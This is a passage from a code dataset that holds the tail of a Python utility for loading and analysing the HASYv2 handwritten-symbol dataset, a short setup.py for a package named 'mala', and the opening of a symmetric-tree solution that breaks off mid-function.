\"classification-task/fold-{}\".format(fold))\n train_csv_fpath = os.path.join(fold_dir, \"train.csv\")\n test_csv_fpath = os.path.join(fold_dir, \"test.csv\")\n train_csv = _load_csv(train_csv_fpath)\n test_csv = _load_csv(test_csv_fpath)\n\n train_ids = np.array([path2index[row['path']] for row in train_csv])\n test_ids = np.array([path2index[row['path']] for row in test_csv])\n\n x_train = x_compl[train_ids]\n x_test = x_compl[test_ids]\n y_train = y_compl[train_ids]\n y_test = y_compl[test_ids]\n s_train = [s_compl[id_] for id_ in train_ids]\n s_test = [s_compl[id_] for id_ in test_ids]\n\n data = {'x_train': x_train,\n 'y_train': y_train,\n 'x_test': x_test,\n 'y_test': y_test,\n 's_train': s_train,\n 's_test': s_test,\n 'labels': labels\n }\n return data\n elif mode == 'verification':\n # Load the data\n symbol_id2index = globals()[\"symbol_id2index\"]\n base_ = os.path.join(untar_fpath, \"verification-task\")\n\n # Load train data\n train_csv_fpath = os.path.join(base_, \"train.csv\")\n train_csv = _load_csv(train_csv_fpath)\n train_ids = np.array([path2index[row['path']] for row in train_csv])\n x_train = x_compl[train_ids]\n y_train = y_compl[train_ids]\n s_train = [s_compl[id_] for id_ in train_ids]\n\n # Load test data\n test1_csv_fpath = os.path.join(base_, 'test-v1.csv')\n test2_csv_fpath = os.path.join(base_, 'test-v2.csv')\n test3_csv_fpath = os.path.join(base_, 'test-v3.csv')\n\n tmp1 = _load_images_verification_test(test1_csv_fpath,\n x_compl,\n path2index)\n tmp2 = _load_images_verification_test(test2_csv_fpath,\n x_compl,\n path2index)\n tmp3 = _load_images_verification_test(test3_csv_fpath,\n x_compl,\n path2index)\n data = {'train': {'x_train': x_train,\n 'y_train': y_train,\n 'source': s_train},\n 'test-v1': tmp1,\n 'test-v2': tmp2,\n 'test-v3': tmp3}\n return data\n else:\n raise NotImplementedError\n\n\ndef load_images(csv_filepath, symbol_id2index,\n one_hot=True,\n flatten=False,\n normalize=True,\n shuffle=True):\n \"\"\"\n Load the images into a 4D uint8 numpy array [index, y, x, depth].\n\n Parameters\n ----------\n csv_filepath : str\n 'test.csv' or 'train.csv'\n symbol_id2index : dict\n Dictionary generated by generate_index\n one_hot : bool, optional (default: True)\n Make label vector as 1-hot encoding, otherwise index\n flatten : bool, optional (default: False)\n Flatten feature vector\n normalize : bool, optional (default: True)\n Noramlize features to {0.0, 1.0}\n shuffle : bool, optional (default: True)\n Shuffle loaded data\n\n Returns\n -------\n images, labels, source :\n Images is a 4D uint8 numpy array [index, y, x, depth]\n and labels is a 2D uint8 numpy array [index][1-hot enc]\n and source is a list of file paths\n \"\"\"\n WIDTH, HEIGHT = 32, 32\n dataset_path = os.path.dirname(csv_filepath)\n data = _load_csv(csv_filepath)\n if flatten:\n images = np.zeros((len(data), WIDTH * HEIGHT))\n else:\n images = np.zeros((len(data), WIDTH, HEIGHT, 1))\n labels, sources = [], []\n for i, data_item in enumerate(data):\n fname = os.path.join(dataset_path, data_item['path'])\n sources.append(fname)\n if flatten:\n img = scipy.ndimage.imread(fname, flatten=False, mode='L')\n images[i, :] = img.flatten()\n else:\n images[i, :, :, 0] = scipy.ndimage.imread(fname,\n flatten=False,\n mode='L')\n label = symbol_id2index[data_item['symbol_id']]\n labels.append(label)\n # Make sure the type of images is float32\n images = np.array(images, dtype=np.float32)\n if normalize:\n images /= 255.0\n data = [images, np.array(labels), sources]\n if shuffle:\n perm = np.arange(len(labels))\n np.random.shuffle(perm)\n data[0] = data[0][perm]\n data[1] = data[1][perm]\n data[2] = [data[2][index] for index in perm]\n if one_hot:\n data = (data[0], np.eye(len(symbol_id2index))[data[1]], data[2])\n return data\n\n\ndef _load_images_verification_test(csv_filepath, x_compl, path2index):\n \"\"\"\n Load images from the verification test files.\n\n Parameters\n ----------\n csv_filepath : str\n Path to 'test-v1.csv' or 'test-v2.csv' or 'test-v3.csv'\n x_compl : numpy array\n Complete hasy data\n path2index : dict\n Map paths to indices of x_compl\n\n Returns\n -------\n list\n [x1s, x2s, labels, sources] where all four are lists of equal length\n x1s and x2s contain images,\n labels contains either True or False\n sources contains strings\n \"\"\"\n test1_csv = _load_csv(csv_filepath)\n test1_x1_ids = np.array([path2index[row['path1']]\n for row in test1_csv])\n test1_x2_ids = np.array([path2index[row['path2']]\n for row in test1_csv])\n test1_ys = np.array([row['is_same'] == 'True' for row in test1_csv],\n dtype=np.float64)\n test1_sources = [(row['path1'], row['path2']) for row in test1_csv]\n return {'X1s': x_compl[test1_x1_ids],\n 'X2s': x_compl[test1_x2_ids],\n 'ys': test1_ys,\n 'sources': test1_sources}\n\n\ndef _maybe_download(expected_files, work_directory='HASYv2'):\n \"\"\"\n Download the data, unless it is already there.\n\n Parameters\n ----------\n expected_files : list\n Each list contains a dict with keys 'filename', 'source', 'md5sum',\n where 'filename' denotes the local filename within work_directory,\n 'source' is an URL where the file can be downloaded and\n 'md5sum' is the expected MD5 sum of the file\n work_directory : str\n \"\"\"\n if not os.path.exists(work_directory):\n os.mkdir(work_directory)\n for entry in expected_files:\n filepath = os.path.join(work_directory, entry['filename'])\n logging.info(\"Search '%s'\", filepath)\n if not os.path.exists(filepath):\n filepath, _ = urllib.request.urlretrieve(entry['source'], filepath)\n statinfo = os.stat(filepath)\n logging.info('Successfully downloaded %s (%i bytes)'\n % (entry['filename'], statinfo.st_size))\n with open(filepath, 'rb') as f:\n md5sum_actual = hashlib.md5(f.read()).hexdigest()\n if md5sum_actual != entry['md5sum']:\n logging.error(\"File '%s' was expected to have md5sum %s, but \"\n \"has '%s'\",\n entry['filename'],\n entry['md5sum'],\n md5sum_actual)\n else:\n with open(filepath, 'rb') as f:\n md5sum_actual = hashlib.md5(f.read()).hexdigest()\n if md5sum_actual != entry['md5sum']:\n logging.error(\"File '%s' was expected to have md5sum %s, but \"\n \"has '%s'\",\n entry['filename'],\n entry['md5sum'],\n md5sum_actual)\n\n\ndef _maybe_extract(tarfile_path, work_directory):\n import tarfile\n hasy_tools_path = os.path.join(work_directory, \"hasy_tools.py\")\n if not os.path.isfile(hasy_tools_path):\n with tarfile.open(tarfile_path, \"r:bz2\") as tar:\n tar.extractall(path=work_directory)\n\n\ndef _get_data(dataset_path):\n \"\"\"\n Download data and extract it, if it is not already in dataset_path.\n\n Parameters\n ----------\n dataset_path : str\n \"\"\"\n filelist = [{'filename': 'HASYv2.tar.bz2',\n 'source': ('https://zenodo.org/record/259444/files/'\n 'HASYv2.tar.bz2'),\n 'md5sum': 'fddf23f36e24b5236f6b3a0880c778e3'}]\n _maybe_download(filelist, work_directory=dataset_path)\n tar_filepath = os.path.join(dataset_path, filelist[0]['filename'])\n _maybe_extract(tar_filepath, dataset_path)\n\n\ndef _is_valid_png(filepath):\n \"\"\"\n Check if the PNG image is valid.\n\n Parameters\n ----------\n filepath : str\n Path to a PNG image\n\n Returns\n -------\n bool : True if the PNG image is valid, otherwise False.\n \"\"\"\n try:\n test = Image.open(filepath)\n test.close()\n return True\n except:\n return False\n\n\ndef _verify_all(csv_data_path):\n \"\"\"Verify all PNG files in the training and test directories.\"\"\"\n train_data = _load_csv(csv_data_path)\n for data_item in train_data:\n if not _is_valid_png(data_item['path']):\n logging.info(\"%s is invalid.\" % data_item['path'])\n logging.info(\"Checked %i items of %s.\" %\n (len(train_data), csv_data_path))\n\n\ndef create_random_overview(img_src, x_images, y_images):\n \"\"\"Create a random overview of images.\"\"\"\n # Create canvas\n background = Image.new('RGB',\n (35 * x_images, 35 * y_images),\n (255, 255, 255))\n bg_w, bg_h = background.size\n # Paste image on canvas\n for x in range(x_images):\n for y in range(y_images):\n path = random.choice(img_src)['path']\n img = Image.open(path, 'r')\n img_w, img_h = img.size\n offset = (35 * x, 35 * y)\n background.paste(img, offset)\n # Draw lines\n draw = ImageDraw.Draw(background)\n for y in range(y_images): # horizontal lines\n draw.line((0, 35 * y - 2, 35 * x_images, 35 * y - 2), fill=0)\n for x in range(x_images): # vertical lines\n draw.line((35 * x - 2, 0, 35 * x - 2, 35 * y_images), fill=0)\n # Store\n background.save('hasy-overview.png')\n\n\ndef _get_colors(data, verbose=False):\n \"\"\"\n Get how often each color is used in data.\n\n Parameters\n ----------\n data : dict\n with key 'path' pointing to an image\n verbose : bool, optional\n\n Returns\n -------\n color_count : dict\n Maps a grayscale value (0..255) to how often it was in `data`\n \"\"\"\n color_count = {}\n for i in range(256):\n color_count[i] = 0\n for i, data_item in enumerate(data):\n if i % 1000 == 0 and i > 0 and verbose:\n print(\"%i of %i done\" % (i, len(data)))\n fname = os.path.join('.', data_item['path'])\n img = scipy.ndimage.imread(fname, flatten=False, mode='L')\n for row in img:\n for pixel in row:\n color_count[pixel] += 1\n return color_count\n\n\ndef data_by_class(data):\n \"\"\"\n Organize `data` by class.\n\n Parameters\n ----------\n data : list of dicts\n Each dict contains the key `symbol_id` which is the class label.\n\n Returns\n -------\n dbc : dict\n mapping class labels to lists of dicts\n \"\"\"\n dbc = {}\n for item in data:\n if item['symbol_id'] in dbc:\n dbc[item['symbol_id']].append(item)\n else:\n dbc[item['symbol_id']] = [item]\n return dbc\n\n\ndef _get_color_statistics(csv_filepath, verbose=False):\n \"\"\"\n Count how often white / black is in the image.\n\n Parameters\n ----------\n csv_filepath : str\n 'test.csv' or 'train.csv'\n verbose : bool, optional\n \"\"\"\n symbolid2latex = _get_symbolid2latex()\n data = _load_csv(csv_filepath)\n black_level, classes = [], []\n for symbol_id, elements in data_by_class(data).items():\n colors = _get_colors(elements)\n b = colors[0]\n w = colors[255]\n black_level.append(float(b) / (b + w))\n classes.append(symbol_id)\n if verbose:\n print(\"%s:\\t%0.4f\" % (symbol_id, black_level[-1]))\n print(\"Average black level: {:0.2f}%\"\n .format(np.average(black_level) * 100))\n print(\"Median black level: {:0.2f}%\"\n .format(np.median(black_level) * 100))\n print(\"Minimum black level: {:0.2f}% (class: {})\"\n .format(min(black_level),\n [symbolid2latex[c]\n for bl, c in zip(black_level, classes)\n if bl <= min(black_level)]))\n print(\"Maximum black level: {:0.2f}% (class: {})\"\n .format(max(black_level),\n [symbolid2latex[c]\n for bl, c in zip(black_level, classes)\n if bl >= max(black_level)]))\n\n\ndef _get_symbolid2latex(csv_filepath='symbols.csv'):\n \"\"\"Return a dict mapping symbol_ids to LaTeX code.\"\"\"\n symbol_data = _load_csv(csv_filepath)\n symbolid2latex = {}\n for row in symbol_data:\n symbolid2latex[row['symbol_id']] = row['latex']\n return symbolid2latex\n\n\ndef _analyze_class_distribution(csv_filepath,\n max_data,\n bin_size):\n \"\"\"Plot the distribution of training data over graphs.\"\"\"\n symbol_id2index, labels = generate_index(csv_filepath)\n index2symbol_id = {}\n for index, symbol_id in symbol_id2index.items():\n index2symbol_id[symbol_id] = index\n data, y, s = load_images(csv_filepath, symbol_id2index, one_hot=False)\n\n data = {}\n for el in y:\n if el in data:\n data[el] += 1\n else:\n data[el] = 1\n classes = data\n images = len(y)\n\n # Create plot\n print(\"Classes: %i\" % len(classes))\n print(\"Images: %i\" % images)\n\n class_counts = sorted([count for _, count in classes.items()])\n print(\"\\tmin: %i\" % min(class_counts))\n\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n # plt.title('HASY training data distribution')\n plt.xlabel('Amount of available testing images')\n plt.ylabel('Number of classes')\n\n # Where we want the ticks, in pixel locations\n ticks = [int(el) for el in list(np.linspace(0, max_data, 21))]\n # What those pixel locations correspond to in data coordinates.\n # Also set the float format here\n ax1.set_xticks(ticks)\n labels = ax1.get_xticklabels()\n plt.setp(labels, rotation=30)\n\n min_examples = 0\n ax1.hist(class_counts, bins=range(min_examples, max_data + 1, bin_size))\n # plt.show()\n filename = '{}.pdf'.format('data-dist')\n plt.savefig(filename)\n logging.info(\"Plot has been saved as {}\".format(filename))\n\n symbolid2latex = _get_symbolid2latex()\n\n top10 = sorted(classes.items(), key=lambda n: n[1], reverse=True)[:10]\n top10_data = 0\n for index, count in top10:\n print(\"\\t%s:\\t%i\" % (symbolid2latex[index2symbol_id[index]], count))\n top10_data += count\n total_data = sum([count for index, count in classes.items()])\n print(\"Top-10 has %i training data (%0.2f%% of total)\" %\n (top10_data, float(top10_data) * 100.0 / total_data))\n print(\"%i classes have more than %i data items.\" %\n (sum([1 for _, count in classes.items() if count > max_data]),\n max_data))\n\n\ndef _analyze_pca(csv_filepath):\n \"\"\"\n Analyze how much data can be compressed.\n\n Parameters\n ----------\n csv_filepath : str\n Path relative to dataset_path to a CSV file which points to images\n \"\"\"\n from sklearn.decomposition import PCA\n import itertools as it\n\n symbol_id2index, labels = generate_index(csv_filepath)\n data, y, s = load_images(csv_filepath, symbol_id2index, one_hot=False)\n data = data.reshape(data.shape[0], data.shape[1] * data.shape[2])\n pca = PCA()\n pca.fit(data)\n sum_ = 0.0\n done_values = [None, None, None]\n done_points = [False, False, False]\n chck_points = [0.9, 0.95, 0.99]\n for counter, el in enumerate(pca.explained_variance_ratio_):\n sum_ += el\n for check_point, done, i in zip(chck_points, done_points, it.count()):\n if not done and sum_ >= check_point:\n done_points[i] = counter\n done_values[i] = sum_\n for components, variance in zip(done_points, done_values):\n print(\"%i components explain %0.2f of the variance\" %\n (components, variance))\n\n\ndef _get_euclidean_dist(e1, e2):\n \"\"\"Calculate the euclidean distance between e1 and e2.\"\"\"\n e1 = e1.flatten()\n e2 = e2.flatten()\n return sum([(el1 - el2)**2 for el1, el2 in zip(e1, e2)])**0.5\n\n\ndef _inner_class_distance(data):\n \"\"\"Measure the eucliden distances of one class to the mean image.\"\"\"\n distances = []\n mean_img = None\n for e1 in data:\n fname1 = os.path.join('.', e1['path'])\n img1 = scipy.ndimage.imread(fname1, flatten=False, mode='L')\n if mean_img is None:\n mean_img = img1.tolist()\n else:\n mean_img += img1\n mean_img = mean_img / float(len(data))\n # mean_img = thresholdize(mean_img, 'auto')\n scipy.misc.imshow(mean_img)\n for e1 in data:\n fname1 = os.path.join('.', e1['path'])\n img1 = scipy.ndimage.imread(fname1, flatten=False, mode='L')\n dist = _get_euclidean_dist(img1, mean_img)\n distances.append(dist)\n\n return (distances, mean_img)\n\n\ndef thresholdize(img, threshold=0.5):\n \"\"\"Create a black-and-white image from a grayscale image.\"\"\"\n img_new = []\n if threshold == 'auto':\n img_flat = sorted(img.flatten())\n threshold_ind = int(0.85 * len(img_flat))\n threshold = img_flat[threshold_ind]\n for row in img:\n bla = []\n for col in row:\n if col > threshold:\n bla.append(1)\n else:\n bla.append(0)\n img_new.append(bla)\n return np.array(img_new)\n\n\ndef _analyze_distances(csv_filepath):\n \"\"\"Analyze the distance between elements of one class and class means.\"\"\"\n symbolid2latex = _get_symbolid2latex()\n data = _load_csv(csv_filepath)\n data = data_by_class(data)\n mean_imgs = []\n for class_, data_class in data.items():\n latex = symbolid2latex[class_]\n d, mean_img = _inner_class_distance(data_class)\n # scipy.misc.imshow(mean_img)\n print(\"%s: min=%0.4f, avg=%0.4f, median=%0.4f max=%0.4f\" %\n (latex, np.min(d), np.average(d), np.median(d), np.max(d)))\n distarr = sorted([(label, mean_c, _get_euclidean_dist(mean_c,\n mean_img))\n for label, mean_c in mean_imgs],\n key=lambda n: n[2])\n for label, mean_c, d in distarr:\n print(\"\\t%s: %0.4f\" % (label, d))\n mean_imgs.append((latex, mean_img))\n\n\ndef _analyze_variance(csv_filepath):\n \"\"\"Calculate the variance of each pixel.\"\"\"\n symbol_id2index, labels = generate_index(csv_filepath)\n data, y, s = load_images(csv_filepath, symbol_id2index, one_hot=False)\n # Calculate mean\n sum_ = np.zeros((32, 32))\n for el in data:\n el = np.squeeze(el)\n sum_ += el\n mean_ = sum_ / float(len(data))\n scipy.misc.imshow(mean_)\n\n # Calculate variance\n centered_ = np.zeros((32, 32))\n for el in data:\n el = np.squeeze(el)\n centered_ += (el - mean_)**2\n centered_ = (1. / len(data)) * centered_**0.5\n scipy.misc.imshow(centered_)\n for row in list(centered_):\n row = list(row)\n print(\" \".join([\"%0.1f\" % nr for nr in row]))\n\n\ndef _analyze_correlation(csv_filepath):\n \"\"\"\n Analyze and visualize the correlation of features.\n\n Parameters\n ----------\n csv_filepath : str\n Path to a CSV file which points to images\n \"\"\"\n import pandas as pd\n from matplotlib import pyplot as plt\n from matplotlib import cm as cm\n\n symbol_id2index, labels = generate_index(csv_filepath)\n data, y, s = load_images(csv_filepath,\n symbol_id2index,\n one_hot=False,\n flatten=True)\n df = pd.DataFrame(data=data)\n\n logging.info(\"Data loaded. Start correlation calculation. Takes 1.5h.\")\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n\n # Where we want the ticks, in pixel locations\n ticks = np.linspace(0, 1024, 17)\n # What those pixel locations correspond to in data coordinates.\n # Also set the float format here\n ax1.set_xticks(ticks)\n ax1.set_yticks(ticks)\n labels = ax1.get_xticklabels()\n plt.setp(labels, rotation=30)\n\n cmap = cm.get_cmap('viridis', 30)\n cax = ax1.imshow(df.corr(), interpolation=\"nearest\", cmap=cmap)\n ax1.grid(True)\n # Add colorbar, make sure to specify tick locations to match desired\n # ticklabels\n fig.colorbar(cax, ticks=[-0.15, 0, 0.15, 0.30, 0.45, 0.60, 0.75, 0.90, 1])\n filename = '{}.pdf'.format('feature-correlation')\n plt.savefig(filename)\n\n\ndef _create_stratified_split(csv_filepath, n_splits):\n \"\"\"\n Create a stratified split for the classification task.\n\n Parameters\n ----------\n csv_filepath : str\n Path to a CSV file which points to images\n n_splits : int\n Number of splits to make\n \"\"\"\n from sklearn.model_selection import StratifiedKFold\n data = _load_csv(csv_filepath)\n labels = [el['symbol_id'] for el in data]\n skf = StratifiedKFold(labels, n_folds=n_splits)\n i = 1\n kdirectory = 'classification-task'\n if not os.path.exists(kdirectory):\n os.makedirs(kdirectory)\n for train_index, test_index in skf:\n print(\"Create fold %i\" % i)\n directory = \"%s/fold-%i\" % (kdirectory, i)\n if not os.path.exists(directory):\n os.makedirs(directory)\n else:\n print(\"Directory '%s' already exists. Please remove it.\" %\n directory)\n i += 1\n train = [data[el] for el in train_index]\n test_ = [data[el] for el in test_index]\n for dataset, name in [(train, 'train'), (test_, 'test')]:\n with open(\"%s/%s.csv\" % (directory, name), 'wb') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(('path', 'symbol_id', 'latex', 'user_id'))\n for el in dataset:\n csv_writer.writerow((\"../../%s\" % el['path'],\n el['symbol_id'],\n el['latex'],\n el['user_id']))\n\n\ndef _create_pair(r1_data, r2_data):\n \"\"\"Create a pair for the verification test.\"\"\"\n symbol_index = random.choice(r1_data.keys())\n r1 = random.choice(r1_data[symbol_index])\n is_same = random.choice([True, False])\n if is_same:\n symbol_index2 = symbol_index\n r2 = random.choice(r1_data[symbol_index2])\n else:\n symbol_index2 = random.choice(r2_data.keys())\n while symbol_index2 == symbol_index:\n symbol_index2 = random.choice(r2_data.keys())\n r2 = random.choice(r2_data[symbol_index2])\n return (r1['path'], r2['path'], is_same)\n\n\ndef _create_verification_task(sample_size=32, test_size=0.05):\n \"\"\"\n Create the datasets for the verification task.\n\n Parameters\n ----------\n sample_size : int\n Number of classes which will be taken completely\n test_size : float in (0, 1)\n Percentage of the remaining data to be taken to test\n \"\"\"\n # Get the data\n data = _load_csv('hasy-data-labels.csv')\n for el in data:\n el['path'] = \"../hasy-data/\" + el['path'].split(\"hasy-data/\")[1]\n data = sorted(data_by_class(data).items(),\n key=lambda n: len(n[1]),\n reverse=True)\n symbolid2latex = _get_symbolid2latex()\n\n # Get complete classes\n symbols = random.sample(range(len(data)), k=sample_size)\n symbols = sorted(symbols, reverse=True)\n test_data_excluded = []\n for symbol_index in symbols:\n # for class_label, items in data:\n class_label, items = data.pop(symbol_index)\n test_data_excluded += items\n print(symbolid2latex[class_label])\n\n # Get data from remaining classes\n data_n = []\n for class_label, items in data:\n data_n = data_n + items\n ys = [el['symbol_id'] for el in data_n]\n x_train, x_test, y_train, y_test = train_test_split(data_n,\n ys,\n test_size=test_size)\n\n # Write the training / test data\n print(\"Test data (excluded symbols) = %i\" % len(test_data_excluded))\n print(\"Test data (included symbols) = %i\" % len(x_test))\n print(\"Test data (total) = %i\" % (len(x_test) + len(test_data_excluded)))\n kdirectory = 'verification-task'\n if not os.path.exists(kdirectory):\n os.makedirs(kdirectory)\n with open(\"%s/train.csv\" % kdirectory, 'wb') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(('path', 'symbol_id', 'latex', 'user_id'))\n for el in x_train:\n csv_writer.writerow((el['path'],\n el['symbol_id'],\n el['latex'],\n el['user_id']))\n\n x_test_inc_class = data_by_class(x_test)\n x_text_exc_class = data_by_class(test_data_excluded)\n # V1: Both symbols belong to the training set (included symbols)\n with open(\"%s/test-v1.csv\" % kdirectory, 'wb') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(('path1', 'path2', 'is_same'))\n for i in range(100000):\n test_data_tuple = _create_pair(x_test_inc_class, x_test_inc_class)\n csv_writer.writerow(test_data_tuple)\n\n # V2: r1 belongs to a symbol in the training set, but r2 might not\n with open(\"%s/test-v2.csv\" % kdirectory, 'wb') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(('path1', 'path2', 'is_same'))\n for i in range(100000):\n test_data_tuple = _create_pair(x_test_inc_class, x_text_exc_class)\n csv_writer.writerow(test_data_tuple)\n\n # V3: r1 and r2 both don't belong to symbols in the training set\n with open(\"%s/test-v3.csv\" % kdirectory, 'wb') as csv_file:\n csv_writer = csv.writer(csv_file)\n csv_writer.writerow(('path1', 'path2', 'is_same'))\n for i in range(100000):\n test_data_tuple = _create_pair(x_text_exc_class, x_text_exc_class)\n csv_writer.writerow(test_data_tuple)\n\n\ndef _count_users(csv_filepath):\n \"\"\"\n Count the number of users who contributed to the dataset.\n\n Parameters\n ----------\n csv_filepath : str\n Path to a CSV file which points to images\n \"\"\"\n data = _load_csv(csv_filepath)\n user_ids = {}\n for el in data:\n if el['user_id'] not in user_ids:\n user_ids[el['user_id']] = [el['path']]\n else:\n user_ids[el['user_id']].append(el['path'])\n max_els = 0\n max_user = 0\n for user_id, elements in user_ids.items():\n if len(elements) > max_els:\n max_els = len(elements)\n max_user = user_id\n print(\"Dataset has %i users.\" % len(user_ids))\n print(\"User %s created most (%i elements, %0.2f%%)\" %\n (max_user, max_els, float(max_els) / len(data) * 100.0))\n\n\ndef _analyze_cm(cm_file, total_symbols=100):\n \"\"\"\n Analyze a confusion matrix.\n\n Parameters\n ----------\n cm_file : str\n Path to a confusion matrix in JSON format.\n Each line contains a list of non-negative integers.\n cm[i][j] indicates how often members of class i were labeled with j\n \"\"\"\n symbolid2latex = _get_symbolid2latex()\n symbol_id2index, labels = generate_index('hasy-data-labels.csv')\n index2symbol_id = {}\n for index, symbol_id in symbol_id2index.items():\n index2symbol_id[symbol_id] = index\n\n # Load CM\n with open(cm_file) as data_file:\n cm = json.load(data_file)\n class_accuracy = []\n n = len(cm)\n test_samples_sum = np.sum(cm)\n # Number of recordings for symbols which don't have a single correct\n # prediction\n sum_difficult_none = 0\n # Number of recordings for symbols which have an accuracy of less than 5%\n sum_difficult_five = 0\n for i in range(n):\n total = sum([cm[i][j] for j in range(n)])\n class_accuracy.append({'class_index': i,\n 'class_accuracy': float(cm[i][i]) / total,\n 'class_confusion_index': np.argmax(cm[i]),\n 'correct_total': cm[i][i],\n 'class_total': total})\n print(\"Lowest class accuracies:\")\n class_accuracy = sorted(class_accuracy, key=lambda n: n['class_accuracy'])\n index2latex = lambda n: symbolid2latex[index2symbol_id[n]]\n for i in range(total_symbols):\n if class_accuracy[i]['correct_total'] == 0:\n sum_difficult_none += class_accuracy[i]['class_total']\n if class_accuracy[i]['class_accuracy'] < 0.05:\n sum_difficult_five += class_accuracy[i]['class_total']\n latex_orig = index2latex(class_accuracy[i]['class_index'])\n latex_conf = index2latex(class_accuracy[i]['class_confusion_index'])\n # print(\"\\t%i. \\t%s:\\t%0.4f (%s); correct=%i\" %\n # (i + 1,\n # latex_orig,\n # class_accuracy[i]['class_accuracy'],\n # latex_conf,\n # class_accuracy[i]['correct_total']))\n print((\"\\t\\\\verb+{:<15}+ & ${:<15}$ & {:<15} & \\\\verb+{:<15}+ \"\n \"& ${:<15}$ \\\\\\\\ ({})\").format\n (latex_orig, latex_orig,\n class_accuracy[i]['class_total'],\n latex_conf, latex_conf,\n class_accuracy[i]['correct_total']))\n print(\"Non-correct: %0.4f%%\" %\n (sum_difficult_none / float(test_samples_sum)))\n print(\"five-correct: %0.4f%%\" %\n (sum_difficult_five / float(test_samples_sum)))\n\n print(\"Easy classes\")\n class_accuracy = sorted(class_accuracy,\n key=lambda n: n['class_accuracy'],\n reverse=True)\n for i in range(total_symbols):\n latex_orig = index2latex(class_accuracy[i]['class_index'])\n latex_conf = index2latex(class_accuracy[i]['class_confusion_index'])\n if class_accuracy[i]['class_accuracy'] < 0.99:\n break\n # print(\"\\t%i. \\t%s:\\t%0.4f (%s); correct=%i\" %\n # (i + 1,\n # latex_orig,\n # class_accuracy[i]['class_accuracy'],\n # latex_conf,\n # class_accuracy[i]['correct_total']))\n print((\"\\t\\\\verb+{:<15}+ & ${:<15}$ & {:<15} & \"\n \"\\\\verb+{:<15}+ & ${:<15}$ \\\\\\\\ ({})\").format\n (latex_orig, latex_orig,\n class_accuracy[i]['class_total'],\n latex_conf, latex_conf,\n class_accuracy[i]['correct_total']))\n # cm = np.array(cm)\n # scipy.misc.imshow(cm)\n\n\ndef preprocess(x):\n \"\"\"Preprocess features.\"\"\"\n x = x.astype('float32')\n x /= 255.0\n return x\n\n\ndef _get_parser():\n \"\"\"Get parser object for hasy_tools.py.\"\"\"\n import argparse\n from argparse import ArgumentParser, ArgumentDefaultsHelpFormatter\n parser = ArgumentParser(description=__doc__,\n formatter_class=ArgumentDefaultsHelpFormatter)\n parser.add_argument(\"--dataset\",\n dest=\"dataset\",\n help=\"specify which data to use\")\n parser.add_argument(\"--verify\",\n dest=\"verify\",\n action=\"store_true\",\n default=False,\n help=\"verify PNG files\")\n parser.add_argument(\"--overview\",\n dest=\"overview\",\n action=\"store_true\",\n default=False,\n help=\"Get overview of data\")\n parser.add_argument(\"--analyze_color\",\n dest=\"analyze_color\",\n action=\"store_true\",\n default=False,\n help=\"Analyze the color distribution\")\n parser.add_argument(\"--class_distribution\",\n dest=\"class_distribution\",\n action=\"store_true\",\n default=False,\n help=\"Analyze the class distribution\")\n parser.add_argument(\"--distances\",\n dest=\"distances\",\n action=\"store_true\",\n default=False,\n help=\"Analyze the euclidean distance distribution\")\n parser.add_argument(\"--pca\",\n dest=\"pca\",\n action=\"store_true\",\n default=False,\n help=(\"Show how many principal components explain \"\n \"90%% / 95%% / 99%% of the variance\"))\n parser.add_argument(\"--variance\",\n dest=\"variance\",\n action=\"store_true\",\n default=False,\n help=\"Analyze the variance of features\")\n parser.add_argument(\"--correlation\",\n dest=\"correlation\",\n action=\"store_true\",\n default=False,\n help=\"Analyze the correlation of features\")\n parser.add_argument(\"--create-classification-task\",\n dest=\"create_folds\",\n action=\"store_true\",\n default=False,\n help=argparse.SUPPRESS)\n parser.add_argument(\"--create-verification-task\",\n dest=\"create_verification_task\",\n action=\"store_true\",\n default=False,\n help=argparse.SUPPRESS)\n parser.add_argument(\"--count-users\",\n dest=\"count_users\",\n action=\"store_true\",\n default=False,\n help=\"Count how many different users have created \"\n \"the dataset\")\n parser.add_argument(\"--analyze-cm\",\n dest=\"cm\",\n default=False,\n help=\"Analyze a confusion matrix in JSON format.\")\n return parser\n\n\nif __name__ == \"__main__\":\n args = _get_parser().parse_args()\n if args.verify:\n if args.dataset is None:\n logging.error(\"--dataset needs to be set for --verify\")\n sys.exit()\n _verify_all(args.dataset)\n if args.overview:\n img_src = _load_csv(args.dataset)\n create_random_overview(img_src, x_images=10, y_images=10)\n if args.analyze_color:\n _get_color_statistics(csv_filepath=args.dataset)\n if args.class_distribution:\n _analyze_class_distribution(csv_filepath=args.dataset,\n max_data=1000,\n bin_size=25)\n if args.pca:\n _analyze_pca(csv_filepath=args.dataset)\n if args.distances:\n _analyze_distances(csv_filepath=args.dataset)\n if args.variance:\n _analyze_variance(csv_filepath=args.dataset)\n if args.correlation:\n _analyze_correlation(csv_filepath=args.dataset)\n if args.create_folds:\n _create_stratified_split(args.dataset, int(args.create_folds))\n if args.count_users:\n _count_users(csv_filepath=args.dataset)\n if args.create_verification_task:\n _create_verification_task()\n if args.cm:\n _analyze_cm(args.cm)\n","sub_path":"hasy_tools.py","file_name":"hasy_tools.py","file_ext":"py","file_size_in_byte":46316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"416252371","text":"from setuptools import setup\n\n# Doing it as suggested here:\n# https://packaging.python.org/guides/single-sourcing-package-version/\n# (number 3)\n\nversion = {}\nwith open(\"mala/version.py\") as fp:\n exec(fp.read(), version)\n\nsetup(\n name=\"mala\",\n version=version[\"__version__\"],\n description=\"Framework for Electronic Structure Learning\",\n url=\"https://gitlab.com/hzdr/mala/mala\",\n author=\"Lenz Fiedler\",\n author_email=\"l.fiedler@hzdr.de\",\n license=\"MIT\",\n packages=[\"mala\"],\n zip_safe=False,\n install_requires=open('requirements.txt').read().splitlines(),\n python_requires='<3.9',\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"84276379","text":"# -*- coding: utf-8 -*-\n# @Time : 2019/5/18 20:57\n# @Author : pf_xu\n# @FileName: symmetric-tree.py\n\n\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\ndef isSymmetric(root):\n\n def check(node1, node2):\n if not node1 and not node2:\n return True\n elif not node1 or not node2:\n return 